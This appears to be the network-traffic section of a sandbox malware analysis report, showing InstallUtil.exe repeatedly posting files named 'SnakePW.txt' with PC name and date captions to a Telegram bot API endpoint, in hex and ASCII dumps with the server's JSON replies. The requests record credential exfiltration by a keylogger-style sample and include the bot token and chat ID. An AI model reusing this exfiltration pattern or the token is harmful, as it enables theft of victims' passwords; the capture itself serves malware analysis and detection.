                                                                                    Data Ascii: {"ok":true,"result":{"message_id":139,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765199


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    40192.168.2.550026149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:40 UTC328OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd379862e661cd
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    2025-01-13 10:46:40 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 37 39 38 36 32 65 36 36 31 63 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd379862e661cdContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:40 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:40 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 523
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:40 UTC523INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 34 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 32 30 30
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":140,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765200


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    41192.168.2.550027149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:40 UTC352OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd37b9e640e973
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    Connection: Keep-Alive
                                                                                    2025-01-13 10:46:40 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 37 62 39 65 36 34 30 65 39 37 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd37b9e640e973Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:41 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:41 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:41 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 34 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 32 30 31
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":141,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765201


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    42192.168.2.550028149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:41 UTC328OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd37db59945392
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    2025-01-13 10:46:41 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 37 64 62 35 39 39 34 35 33 39 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd37db59945392Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:42 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:42 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:42 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 34 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 32 30 32
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":142,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765202


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    43192.168.2.550029149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:42 UTC352OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd37f7ca016cff
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    Connection: Keep-Alive
                                                                                    2025-01-13 10:46:42 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 37 66 37 63 61 30 31 36 63 66 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd37f7ca016cffContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:43 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:43 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:43 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 34 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 32 30 33
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":143,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765203


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    44192.168.2.550030149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:43 UTC328OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd3831ced81ec7
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    2025-01-13 10:46:43 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 38 33 31 63 65 64 38 31 65 63 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd3831ced81ec7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:44 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:44 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:44 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 34 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 32 30 33
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":144,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765203


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    45192.168.2.550031149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:44 UTC352OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd386942b99070
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    Connection: Keep-Alive
                                                                                    2025-01-13 10:46:44 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 38 36 39 34 32 62 39 39 30 37 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd386942b99070Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:45 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:44 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:45 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 34 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 32 30 34
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":145,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765204


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    46192.168.2.550032149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:45 UTC328OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd389360758da4
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    2025-01-13 10:46:45 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 38 39 33 36 30 37 35 38 64 61 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd389360758da4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:46 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:45 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:46 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 34 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 32 30 35
